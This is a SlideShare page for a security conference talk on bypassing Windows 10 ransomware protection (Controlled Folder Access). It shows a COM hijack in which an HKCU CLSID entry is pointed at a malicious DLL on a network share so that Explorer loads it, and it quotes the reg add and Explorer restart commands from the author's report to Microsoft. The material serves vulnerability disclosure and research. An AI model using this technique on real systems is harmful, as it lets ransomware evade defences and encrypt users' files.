SlideShare a Scribd company logo

An inconvenient truth: Evading the Ransomware Protection in windows 10 @ HackMiami

Download as PPTX, PDF
S
Soya Aoyama

The WannaCry cyber-attack all over the world in May, 2017 is still fresh in our minds. The malware encrypted and rendered useless hundreds of thousands of computers in over 150 countries. As a measure against ransomware, Microsoft introduced the function "Ransomware protection" in "Windows 10 Fall Creators Update". How does this function work? Is it really effective? In this talk, I will explain the operation principles of "Controlled folder access" of"Ransomware protection" through demonstration video. Then I show the requirements to avoid this function, and describe that this function can be avoided very easily. And I will ask you that we may have to reconsider the definition of vulnerability.

Software
1 of 43
An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
My Profile 1992 ~ 2015 software developer of Windows. 2015 ~ security researcher - 2016 AVTOKYO - 2017 BSides Las Vegas - 2018 GrrCON - 2018 ToorCon - 2018 DerbyCon - 2018 AVTOKYO 2018 ~ BSides Tokyo Organizer - 2018 first BSides in East Asia SOYA AOYAMA Researcher @ Fujitsu System Integration Laboratories Ltd Organizer @ BSides Tokyo
History 2016 2017 2018 2019 Research the jump the AirGap BSides Las Vegas
May 12, 2017
May 12, 2017
Microsoft's answer to Ransomware
TANMAY GANACHARYA Principal Group Manager, Windows Defender Research Ransomware protection on Windows 10 For end users, the dreaded ransom note announces that ransomware has already taken their files hostage: documents, precious photos and videos, and other important files encrypted. On Windows 10 Fall Creators Update, a new feature helps stop ransomware from accessing important files in real-time, even if it manages to infect the computer. When enabled, Controlled folder access locks down folders, allowing only authorized apps to access files. https://www.microsoft.com/security/blog/2017/10/23/ stopping-ransomware-where-it-counts-protecting- your-data-with-controlled-folder-access/
The truth is …
DEMO 1
Windows system folders are NOT protected by default.
The truth is …
DEMO 2
Microsoft ONLY knows.
apps folders Ransomware protection Mechanism allowed apps cmdExplorer Protected folders Documents Pictures PowerShell System32
You ain’t Seen nothin' yet!
app folders Simple Idea allowed apps cmdExplorer Protected folders Documents Pictures PowerShell System32
YAGO JESUS MICROSOFT ANTI RANSOMWARE BYPASS By default, Office executables are included in the whitelist so these programs could make changes in protected folders without restrictions. This access level is granted even if a malicious user uses OLE/COM objects to drive Office executables programmatically. So a Ransomware developer could adapt their software to use OLE objects to change / delete / encrypt files invisibly for the files owner http://www.securitybydefault.com/2018/01/microsoft-anti-ransomware-bypass-not.html
My method is …
DEMO 3
Only using a registry
• HKCR = HKLM Software Classes + HKCU Software Classes • HKLM Software Classes < HKCU Software Classes (In case of duplication)
{90AA3A4E-1CBA-4233-B8BB-535773D48449} • HKLMSOFTWARE Classes CLSID • HKCU Software Classes CLSID
HKCR %SysteRoot%system32shell32.dll Explorer.exe Shell32.dll HKCU HKLM %SysteRoot%system32shell32.dll Malicious.dll User’s Files ServerShareMalicious.dll ServerShareMalicious.dll File encryption process Sharing File
How about other antimalware application?
No antimalware application can block my malware
I submitted the vulnerability report to MSRC
This is revenge • Step-by-step instructions to reproduce the issue on a fresh install 1. Put the malicious dll on shared file server. (10.0.1.40shareAnti-ControlledFolderAccess.dll) 2. Start the cmd.exe on target PC. (An administrator privilege is NOT required) 3. Execute the following command. 4. Start the procexp.exe on target PC. reg add HKCUSoftwareClassesCLSID{90AA3A4E-1CBA-4233-B8BB-535773D48449} InprocServer32 /f /ve /t REG_SZ /d 10.0.1.40tmpAnti-ControlledFolderAccess.dll taskkill /IM explorer.exe /F start explorer.exe
MSRC's answer was…
Microsoft Security Servicing Criteria for Windows Security boundaries Security Boundary SecurityGoal Network boundary An unauthorized network endpoint cannot access or tamper with the code and data on a customer’s device. Kernel boundary A non-administrative user mode process cannot access or tamper with kernel code and data. Administrator-to-kernel is not a security boundary. Process boundary An unauthorized user mode process cannot access or tamper with the code and data of another process. AppContainer sandbox boundary An AppContainer-based sandbox process cannot access or tamper with code and data outside of the sandbox based on the container capabilities User boundary A user cannot access or tamper with the code and data of another user without being authorized. Session boundary A user logon session cannot access or tamper with another user logon session without being authorized. Web browser boundary An unauthorized website cannot violate the same-origin policy, nor can it access or tamper with the native code and data of the Microsoft Edge web browser sandbox. Virtual machine boundary An unauthorized Hyper-V guest virtual machine cannot access or tamper with the code and data of another guest virtual machine; this includes Hyper-V Isolated Containers. Virtual Secure Mode boundary Data and code within a VSM trustlet or enclave cannot be accessed or tampered with by code executing outside of the VSM trustlet or enclave.
NOT covered by active bug bounty programs. Defense-in-depth security features Security feature Security Goal User Account Control (UAC) Prevent unwanted system-wide changes (files, registry, etc) without administrator consent AppLocker Prevent unauthorized applications from executing Controlled Folder Access Protect access and modification to controlled folders from apps that may be malicious Mark of the Web (MOTW) Prevent active content download from the web from elevating privileges when viewed locally Kernel Address Space Layout Randomization (KASLR) The layout of the kernel virtual address space is not predictable to an attacker (on 64- bit) Control Flow Guard (CFG) CFG protected code can only make indirect calls to valid indirect call targets Windows Defender Exploit Guard (WDEG) Allow apps to enable additional defense-in-depth exploit mitigation features that make it more difficult to exploit vulnerabilities Protected Process Light (PPL) Prevent non-administrative non-PPL processes from accessing or tampering with code and data in a PPL process via open process functions Shielded Virtual Machines Help protect a VM’s secrets and its data against malicious fabric admins or malware running on the host from both runtime and offline attacks https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria
I can - Escalate privileges to administrator - Evading the Ransomware Protection By inject to Explorer
I’d like to suggest to Microsoft -Load only the signed dll -Implement the ControlledDllLoad mechanism
https://www.facebook.com/soya.aoyama.3 @SoyaAoyama https://www.slideshare.net/SoyaAoyama

Recommended

BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat Security Conference
 
DFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
DFIR Austin Training (Feb 2020): Remote Access & Deploying AgentsDFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
DFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
Christopher Gerritz
 
Living off the land and fileless attack techniques
Living off the land and fileless attack techniquesLiving off the land and fileless attack techniques
Living off the land and fileless attack techniques
Symantec Security Response
 
Hardening Database Server
Hardening Database ServerHardening Database Server
Hardening Database Server
Fahri Firdausillah
 
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat Security Conference
 
Windows server hardening 1
Windows server hardening 1Windows server hardening 1
Windows server hardening 1
Frank Avila Zapata
 
BlueHat v18 || May i see your credentials, please
BlueHat v18 || May i see your credentials, pleaseBlueHat v18 || May i see your credentials, please
BlueHat v18 || May i see your credentials, please
BlueHat Security Conference
 
CSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application securityCSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application security
CanSecWest
 

Recommended

BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat Security Conference
 
DFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
DFIR Austin Training (Feb 2020): Remote Access & Deploying AgentsDFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
DFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
Christopher Gerritz
 
Living off the land and fileless attack techniques
Living off the land and fileless attack techniquesLiving off the land and fileless attack techniques
Living off the land and fileless attack techniques
Symantec Security Response
 
Hardening Database Server
Hardening Database ServerHardening Database Server
Hardening Database Server
Fahri Firdausillah
 
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat Security Conference
 
Windows server hardening 1
Windows server hardening 1Windows server hardening 1
Windows server hardening 1
Frank Avila Zapata
 
BlueHat v18 || May i see your credentials, please
BlueHat v18 || May i see your credentials, pleaseBlueHat v18 || May i see your credentials, please
BlueHat v18 || May i see your credentials, please
BlueHat Security Conference
 
CSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application securityCSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application security
CanSecWest
 
PR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOUR
PR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOURPR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOUR
PR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOURKurtis Armour
 
Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!
Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!
Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!
MSHOWTO Bilisim Toplulugu
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIM
AlienVault
 
The Rising Threat of Fileless Malware
The Rising Threat of Fileless MalwareThe Rising Threat of Fileless Malware
The Rising Threat of Fileless Malware
Chelsea Sisson
 
The CCleaner Infection
The CCleaner InfectionThe CCleaner Infection
The CCleaner Infection
Leonardo Antichi
 
Csw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelistingCsw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelisting
CanSecWest
 
Solving the Open Source Security Puzzle
Solving the Open Source Security PuzzleSolving the Open Source Security Puzzle
Solving the Open Source Security Puzzle
Vic Hargrave
 
Ch08 Microsoft Operating System Vulnerabilities
Ch08 Microsoft Operating System VulnerabilitiesCh08 Microsoft Operating System Vulnerabilities
Ch08 Microsoft Operating System Vulnerabilities
phanleson
 
International collaborative efforts to share threat data in a vetted member c...
International collaborative efforts to share threat data in a vetted member c...International collaborative efforts to share threat data in a vetted member c...
International collaborative efforts to share threat data in a vetted member c...
CODE BLUE
 
What you need to know about ExPetr ransomware
What you need to know about ExPetr ransomwareWhat you need to know about ExPetr ransomware
What you need to know about ExPetr ransomware
Kaspersky
 
Android security
Android securityAndroid security
Android securityMidhun P Gopi
 
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat Security Conference
 
Kaspersky Security center 10 documentation
Kaspersky Security center 10 documentationKaspersky Security center 10 documentation
Kaspersky Security center 10 documentation
Tarek Amer
 
Introduction to Android Development and Security
Introduction to Android Development and SecurityIntroduction to Android Development and Security
Introduction to Android Development and Security
Kelwin Yang
 
Humla workshop on Android Security Testing - null Singapore
Humla workshop on Android Security Testing - null SingaporeHumla workshop on Android Security Testing - null Singapore
Humla workshop on Android Security Testing - null Singapore
n|u - The Open Security Community
 
Advanced OSSEC Training: Integration Strategies for Open Source Security
Advanced OSSEC Training: Integration Strategies for Open Source SecurityAdvanced OSSEC Training: Integration Strategies for Open Source Security
Advanced OSSEC Training: Integration Strategies for Open Source Security
AlienVault
 
Best Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM InstallationBest Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM Installation
AlienVault
 
OSSIM Overview
OSSIM OverviewOSSIM Overview
OSSIM Overview
n|u - The Open Security Community
 
Whats New in OSSIM v2.2?
Whats New in OSSIM v2.2?Whats New in OSSIM v2.2?
Whats New in OSSIM v2.2?
AlienVault
 
PIDS research slides from MALCON 2018 conference - Asaf Hecht
PIDS research slides from MALCON 2018 conference - Asaf HechtPIDS research slides from MALCON 2018 conference - Asaf Hecht
PIDS research slides from MALCON 2018 conference - Asaf Hecht
Asaf Hecht
 
An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
An Inconvenient Truth: Evading the Ransomware Protection in Windows 10An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
Soya Aoyama
 
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...
Alexander Benoit
 

More Related Content

What's hot

PR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOUR
PR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOURPR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOUR
PR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOURKurtis Armour
 
Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!
Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!
Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!
MSHOWTO Bilisim Toplulugu
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIM
AlienVault
 
The Rising Threat of Fileless Malware
The Rising Threat of Fileless MalwareThe Rising Threat of Fileless Malware
The Rising Threat of Fileless Malware
Chelsea Sisson
 
The CCleaner Infection
The CCleaner InfectionThe CCleaner Infection
The CCleaner Infection
Leonardo Antichi
 
Csw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelistingCsw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelisting
CanSecWest
 
Solving the Open Source Security Puzzle
Solving the Open Source Security PuzzleSolving the Open Source Security Puzzle
Solving the Open Source Security Puzzle
Vic Hargrave
 
Ch08 Microsoft Operating System Vulnerabilities
Ch08 Microsoft Operating System VulnerabilitiesCh08 Microsoft Operating System Vulnerabilities
Ch08 Microsoft Operating System Vulnerabilities
phanleson
 
International collaborative efforts to share threat data in a vetted member c...
International collaborative efforts to share threat data in a vetted member c...International collaborative efforts to share threat data in a vetted member c...
International collaborative efforts to share threat data in a vetted member c...
CODE BLUE
 
What you need to know about ExPetr ransomware
What you need to know about ExPetr ransomwareWhat you need to know about ExPetr ransomware
What you need to know about ExPetr ransomware
Kaspersky
 
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat Security Conference
 
Kaspersky Security center 10 documentation
Kaspersky Security center 10 documentationKaspersky Security center 10 documentation
Kaspersky Security center 10 documentation
Tarek Amer
 
Introduction to Android Development and Security
Introduction to Android Development and SecurityIntroduction to Android Development and Security
Introduction to Android Development and Security
Kelwin Yang
 
Humla workshop on Android Security Testing - null Singapore
Humla workshop on Android Security Testing - null SingaporeHumla workshop on Android Security Testing - null Singapore
Humla workshop on Android Security Testing - null Singapore
n|u - The Open Security Community
 
Advanced OSSEC Training: Integration Strategies for Open Source Security
Advanced OSSEC Training: Integration Strategies for Open Source SecurityAdvanced OSSEC Training: Integration Strategies for Open Source Security
Advanced OSSEC Training: Integration Strategies for Open Source Security
AlienVault
 
Best Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM InstallationBest Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM Installation
AlienVault
 
Whats New in OSSIM v2.2?
Whats New in OSSIM v2.2?Whats New in OSSIM v2.2?
Whats New in OSSIM v2.2?
AlienVault
 
PIDS research slides from MALCON 2018 conference - Asaf Hecht
PIDS research slides from MALCON 2018 conference - Asaf HechtPIDS research slides from MALCON 2018 conference - Asaf Hecht
PIDS research slides from MALCON 2018 conference - Asaf Hecht
Asaf Hecht
 

What's hot (20)

PR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOUR
PR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOURPR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOUR
PR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOUR
 
Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!
Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!
Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIM
 
The Rising Threat of Fileless Malware
The Rising Threat of Fileless MalwareThe Rising Threat of Fileless Malware
The Rising Threat of Fileless Malware
 
The CCleaner Infection
The CCleaner InfectionThe CCleaner Infection
The CCleaner Infection
 
Csw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelistingCsw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelisting
 
Solving the Open Source Security Puzzle
Solving the Open Source Security PuzzleSolving the Open Source Security Puzzle
Solving the Open Source Security Puzzle
 
Ch08 Microsoft Operating System Vulnerabilities
Ch08 Microsoft Operating System VulnerabilitiesCh08 Microsoft Operating System Vulnerabilities
Ch08 Microsoft Operating System Vulnerabilities
 
International collaborative efforts to share threat data in a vetted member c...
International collaborative efforts to share threat data in a vetted member c...International collaborative efforts to share threat data in a vetted member c...
International collaborative efforts to share threat data in a vetted member c...
 
What you need to know about ExPetr ransomware
What you need to know about ExPetr ransomwareWhat you need to know about ExPetr ransomware
What you need to know about ExPetr ransomware
 
Android security
Android securityAndroid security
Android security
 
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
 
Kaspersky Security center 10 documentation
Kaspersky Security center 10 documentationKaspersky Security center 10 documentation
Kaspersky Security center 10 documentation
 
Introduction to Android Development and Security
Introduction to Android Development and SecurityIntroduction to Android Development and Security
Introduction to Android Development and Security
 
Humla workshop on Android Security Testing - null Singapore
Humla workshop on Android Security Testing - null SingaporeHumla workshop on Android Security Testing - null Singapore
Humla workshop on Android Security Testing - null Singapore
 
Advanced OSSEC Training: Integration Strategies for Open Source Security
Advanced OSSEC Training: Integration Strategies for Open Source SecurityAdvanced OSSEC Training: Integration Strategies for Open Source Security
Advanced OSSEC Training: Integration Strategies for Open Source Security
 
Best Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM InstallationBest Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM Installation
 
OSSIM Overview
OSSIM OverviewOSSIM Overview
OSSIM Overview
 
Whats New in OSSIM v2.2?
Whats New in OSSIM v2.2?Whats New in OSSIM v2.2?
Whats New in OSSIM v2.2?
 
PIDS research slides from MALCON 2018 conference - Asaf Hecht
PIDS research slides from MALCON 2018 conference - Asaf HechtPIDS research slides from MALCON 2018 conference - Asaf Hecht
PIDS research slides from MALCON 2018 conference - Asaf Hecht
 

Similar to An inconvenient truth: Evading the Ransomware Protection in windows 10 @ HackMiami

An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
An Inconvenient Truth: Evading the Ransomware Protection in Windows 10An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
Soya Aoyama
 
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...
Alexander Benoit
 
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft WindowsInvestigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft WindowsAaron ND Sawmadal
 
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft WindowsInvestigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft WindowsAaron ND Sawmadal
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008ClubHack
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CDamiable_indian
 
Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2
F-Secure Corporation
 
End of Studies project: Malware Repsonse Center
End of Studies project: Malware Repsonse CenterEnd of Studies project: Malware Repsonse Center
End of Studies project: Malware Repsonse Center
Abdessabour Arous
 
August Patch Tuesday Analysis
August Patch Tuesday AnalysisAugust Patch Tuesday Analysis
August Patch Tuesday Analysis
Ivanti
 
Best practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included featuresBest practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included features
Alexander Benoit
 
Cloud Security
Cloud SecurityCloud Security
Cloud Security
Rashmi Agale
 
MS Cloud day - Understanding and implementation on Windows Azure platform sec...
MS Cloud day - Understanding and implementation on Windows Azure platform sec...MS Cloud day - Understanding and implementation on Windows Azure platform sec...
MS Cloud day - Understanding and implementation on Windows Azure platform sec...Spiffy
 
Reducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutionsReducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutions
Jan Seidl
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
Gabriel Mathenge
 
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx
eugeniadean34240
 
Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018
Paula Januszkiewicz
 
Windows Vista and Trust Worthy Computing
Windows Vista and Trust Worthy ComputingWindows Vista and Trust Worthy Computing
Windows Vista and Trust Worthy Computingsamavedam_vijay
 
Symantec White Paper: W32.Ramnit Analysis
Symantec White Paper: W32.Ramnit AnalysisSymantec White Paper: W32.Ramnit Analysis
Symantec White Paper: W32.Ramnit Analysis
Symantec
 
An inconvenient truth: Evading the Ransomware Protection in windows 10 @ LeHack
An inconvenient truth: Evading the Ransomware Protection in windows 10 @ LeHackAn inconvenient truth: Evading the Ransomware Protection in windows 10 @ LeHack
An inconvenient truth: Evading the Ransomware Protection in windows 10 @ LeHack
Soya Aoyama
 

Similar to An inconvenient truth: Evading the Ransomware Protection in windows 10 @ HackMiami (20)

An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
An Inconvenient Truth: Evading the Ransomware Protection in Windows 10An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
 
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...
 
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft WindowsInvestigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
 
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft WindowsInvestigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2
 
End of Studies project: Malware Repsonse Center
End of Studies project: Malware Repsonse CenterEnd of Studies project: Malware Repsonse Center
End of Studies project: Malware Repsonse Center
 
August Patch Tuesday Analysis
August Patch Tuesday AnalysisAugust Patch Tuesday Analysis
August Patch Tuesday Analysis
 
Best practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included featuresBest practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included features
 
Cloud Security
Cloud SecurityCloud Security
Cloud Security
 
MS Cloud day - Understanding and implementation on Windows Azure platform sec...
MS Cloud day - Understanding and implementation on Windows Azure platform sec...MS Cloud day - Understanding and implementation on Windows Azure platform sec...
MS Cloud day - Understanding and implementation on Windows Azure platform sec...
 
Reducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutionsReducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutions
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
 
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx
 
Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018
 
Windows Vista and Trust Worthy Computing
Windows Vista and Trust Worthy ComputingWindows Vista and Trust Worthy Computing
Windows Vista and Trust Worthy Computing
 
Symantec White Paper: W32.Ramnit Analysis
Symantec White Paper: W32.Ramnit AnalysisSymantec White Paper: W32.Ramnit Analysis
Symantec White Paper: W32.Ramnit Analysis
 
An inconvenient truth: Evading the Ransomware Protection in windows 10 @ LeHack
An inconvenient truth: Evading the Ransomware Protection in windows 10 @ LeHackAn inconvenient truth: Evading the Ransomware Protection in windows 10 @ LeHack
An inconvenient truth: Evading the Ransomware Protection in windows 10 @ LeHack
 

Recently uploaded

Graphic Design Crash Course for beginners
Graphic Design Crash Course for beginnersGraphic Design Crash Course for beginners
Graphic Design Crash Course for beginners
e20449
 
How Recreation Management Software Can Streamline Your Operations.pptx
How Recreation Management Software Can Streamline Your Operations.pptxHow Recreation Management Software Can Streamline Your Operations.pptx
How Recreation Management Software Can Streamline Your Operations.pptx
wottaspaceseo
 
Prosigns: Transforming Business with Tailored Technology Solutions
Prosigns: Transforming Business with Tailored Technology SolutionsProsigns: Transforming Business with Tailored Technology Solutions
Prosigns: Transforming Business with Tailored Technology Solutions
Prosigns
 
Lecture 1 Introduction to games development
Lecture 1 Introduction to games developmentLecture 1 Introduction to games development
Lecture 1 Introduction to games development
abdulrafaychaudhry
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
Utilocate provides Smarter, Better, Faster, Safer Locate Ticket Management
Utilocate provides Smarter, Better, Faster, Safer Locate Ticket ManagementUtilocate provides Smarter, Better, Faster, Safer Locate Ticket Management
Utilocate provides Smarter, Better, Faster, Safer Locate Ticket Management
Utilocate
 
Enhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdfEnhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdf
Globus
 
A Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of PassageA Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of Passage
Philip Schwarz
 
Enterprise Resource Planning System in Telangana
Enterprise Resource Planning System in TelanganaEnterprise Resource Planning System in Telangana
Enterprise Resource Planning System in Telangana
NYGGS Automation Suite
 
Launch Your Streaming Platforms in Minutes
Launch Your Streaming Platforms in MinutesLaunch Your Streaming Platforms in Minutes
Launch Your Streaming Platforms in Minutes
Roshan Dwivedi
 
Top 7 Unique WhatsApp API Benefits | Saudi Arabia
Top 7 Unique WhatsApp API Benefits | Saudi ArabiaTop 7 Unique WhatsApp API Benefits | Saudi Arabia
Top 7 Unique WhatsApp API Benefits | Saudi Arabia
Yara Milbes
 
